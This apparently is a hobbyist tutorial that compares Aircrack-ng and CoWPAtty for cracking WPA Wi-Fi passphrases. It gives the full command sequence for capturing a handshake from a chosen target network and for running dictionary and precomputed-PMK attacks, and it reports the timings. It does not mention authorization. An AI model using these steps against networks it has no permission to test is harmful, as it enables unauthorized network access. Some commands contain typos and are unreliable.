Analysis [Aircrack-ng Vs Cowpatty] Wifi Cracking

Analysis I made when a friend asked about "what the fastest tool for cracking Wi-Fi passwords". Here I do not compare one with the other tools to crack wifi passwords. therefore I did the analysis.
in essence, each tool has its own advantages and disadvantages. please your own conclusions :)

1. Aircrack-ng
2. Cowpatty

Assistance Tools:
a. Airolib-ng 
b. genpmk 

the operating system that I use the tools already available :)

Now, go to start :)

Enable monitoring mode 'mon0'
# airmon-ng start wlan0

then, run a airodump-ng for packet capturing of raw
# airodump-ng mon0

select the target you want to try. and here I chose:

# airodump-ng --channel --write (output) --bssid (BSSID) mon0

--channel : Capture on specific channels "4"
--write : Dump file prefix (I store it in the directory /root/ with the name of the output)

NOTE : the output will be automatically changed into a *.cap (ex: output-01.cap)

then ENTER, it will appear as follows
wait until we get a WPA-Handshake :)
if it is not possible to get a handshake, then you can do the aireplay as I posting here

I think we have got the handshake, then run aircrack to perform password cracking.
# aircrack-ng *.cap -w /path/your/wordlists/wordlist.txt


seen in the picture above, succeeded in cracking passwords it within 20 seconds with a speed of 643.17 k/s =))

The next run airolib-ng to store and manage essid and password list
# airolib-ng crackwpa --import passwd wordlists.txt

I create a file with the name crackwpa. and i include the contents wordlists into it

oke. Done.
create a new file with the contents of the target ESSID. and here the file I named "Essid"
# echo -e "TARGET ESSID" > Essid
# cat Essid

The next import file Essid into a file crackwpa
# airolib-ng crackpwa --import essid Essid

Done :).

now, look at the information from the output crackwpa
# airolib-ng crackwpa --stats

Clean the database from old junk. 'all' will also reduce filesize if possible and run an integrity check
# airolib-ng crackwpa --clean all

oke, Done.

now, Start batch-processing all combinations of ESSID and passwords.
# airolib-ng crackwpa --batch

Next. Verify a set of randomly chosen PMKs.
# airolib-ng crackwpa --verify all

all been completed =))

now, go back to aircrack to perform password cracking.
# aircrack -r crackwpa output-01.cap

Amazing. successfully cracking the password in less than a second and with 67990.25 k/s.
at this stage of our previous cracking takes 20 seconds and the speed of 643.17 k/s

then we try to solve these passwords using CoWPAtty
# cowpatty -s "TARGET-ESSID" -r "file *.cap" -f /path/your/wordslist/wordlists.txt

password successfully cracking within a period of 59.85 second 
with speed 165.85 passphrases/second

next, run a genpmk to precompute the hash files in a similar way to Rainbow tables is used to pre-hash passwords.
# genpmk -s "TARGET-ESSID" -d ouput-hash -f /path/your/wordlists/wordlists.txt

I store the hash file by name "output-hash"

then, re run CoWPAtty using the command:
# cowpatty -s "TARGET-ESSID" -r "file *.cap" -d "output-hash"

password successfully cracking within a period 0.10 seconds :
with speed 103861.41 passphrases/second

Conclusion :
1. Aircrack :
successfully cracking the password in less than a second and with speed 67990.25 k/s.

2. Cowpatty :
successfully cracking within a period 0.10 seconds. with speed 103861.41 passphrases/second.

Now. What do you think ???

Hidemichi-Hiroyuki a.k.a [H2]


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